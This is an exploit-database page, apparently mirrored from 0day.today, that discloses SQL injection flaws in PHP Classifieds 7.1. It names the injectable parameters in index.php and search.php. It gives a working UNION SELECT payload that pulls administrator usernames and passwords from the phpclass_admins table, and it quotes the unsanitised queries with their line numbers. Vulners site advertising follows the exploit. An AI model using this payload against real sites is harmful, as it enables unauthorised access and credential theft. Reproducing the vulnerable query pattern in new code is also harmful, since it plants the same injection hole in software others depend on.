Lucene search
+L

PHP Classifieds 7.1 (index.php) Remote SQL Injection Vulnerability

🗓️ 05 Oct 2006 00:00:00Reported by KzarType 
zdt
 zdt
🔗 0day.today👁 18 Views

PHP Classifieds 7.1 Remote SQL Injection Vulnerabilit

Code
==================================================================
PHP Classifieds 7.1 (index.php) Remote SQL Injection Vulnerability
==================================================================




----
App Name: PHP Classifieds => 7.1
App URL: www.deltascripts.com/phpclassifieds
Problem: Multiple SQL Injection exploits
----
Exploit: search.php?catid_search=[sql]
        index.php?catid=[sql]
----
Example: Puts Username and Password in the title and on the page
index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
----
Context: These are the vulnerable queries
select cat_tpl from $cat_tbl where cat_id = ".$_REQUEST["catid_search"]
select cat_name,cat_tpl from $cat_tbl where cat_id = $catid
----

Where: Here are where the problems are
search.php line 28
index.php line 14 to 22



#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation